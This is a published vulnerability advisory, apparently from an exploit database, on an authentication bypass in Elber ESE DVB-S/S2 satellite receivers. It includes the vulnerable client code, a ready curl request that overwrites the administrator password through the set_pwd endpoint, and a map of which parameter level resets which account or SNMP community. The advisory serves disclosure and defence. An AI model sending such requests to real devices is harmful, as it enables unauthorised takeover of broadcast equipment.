76d99ff06e
7 changes to exploits/shellcodes/ghdb Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Authentication Bypass Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Device Config Elber Wayber Analog/Digital Audio STL 4.00 - Authentication Bypass Elber Wayber Analog/Digital Audio STL 4.00 - Device Config Disclosure HughesNet HT2000W Satellite Modem - Password Reset Aurba 501 - Authenticated RCE
68 lines
No EOL
2.3 KiB
Text
68 lines
No EOL
2.3 KiB
Text
Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Authentication Bypass
|
|
|
|
|
|
Vendor: Elber S.r.l.
|
|
Product web page: https://www.elber.it
|
|
Affected version: 1.5.179 Revision 904
|
|
1.5.56 Revision 884
|
|
1.229 Revision 440
|
|
|
|
Summary: ESE (Elber Satellite Equipment) product line, designed for the
|
|
high-end radio contribution and distribution market, where quality and
|
|
reliability are most important. The Elber IRD (Integrated Receiver Decoder)
|
|
ESE-01 offers a professional audio quality (and composite video) at an
|
|
excellent quality/price ratio. The development of digital satellite contribution
|
|
networks and the need to connect a large number of sites require a cheap
|
|
but reliable and performing satellite receiver with integrated decoder.
|
|
|
|
Desc: The device suffers from an authentication bypass vulnerability through
|
|
a direct and unauthorized access to the password management functionality. The
|
|
issue allows attackers to bypass authentication by manipulating the set_pwd
|
|
endpoint that enables them to overwrite the password of any user within the
|
|
system. This grants unauthorized and administrative access to protected areas
|
|
of the application compromising the device's system security.
|
|
|
|
--------------------------------------------------------------------------
|
|
/modules/pwd.html
|
|
------------------
|
|
50: function apply_pwd(level, pwd)
|
|
51: {
|
|
52: $.get("json_data/set_pwd", {lev:level, pass:pwd},
|
|
53: function(data){
|
|
54: //$.alert({title:'Operation',text:data});
|
|
55: show_message(data);
|
|
56: }).fail(function(error){
|
|
57: show_message('Error ' + error.status, 'error');
|
|
58: });
|
|
59: }
|
|
|
|
--------------------------------------------------------------------------
|
|
|
|
Tested on: NBFM Controller
|
|
embOS/IP
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2024-5820
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5820.php
|
|
|
|
|
|
18.08.2023
|
|
|
|
--
|
|
|
|
|
|
$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
|
|
|
|
Ref (lev param):
|
|
|
|
Level 7 = SNMP Write Community (snmp_write_pwd)
|
|
Level 6 = SNMP Read Community (snmp_read_pwd)
|
|
Level 5 = Custom Password? hidden. (custom_pwd)
|
|
Level 4 = Display Password (display_pwd)?
|
|
Level 2 = Administrator Password (admin_pwd)
|
|
Level 1 = Super User Password (puser_pwd)
|
|
Level 0 = User Password (user_pwd) |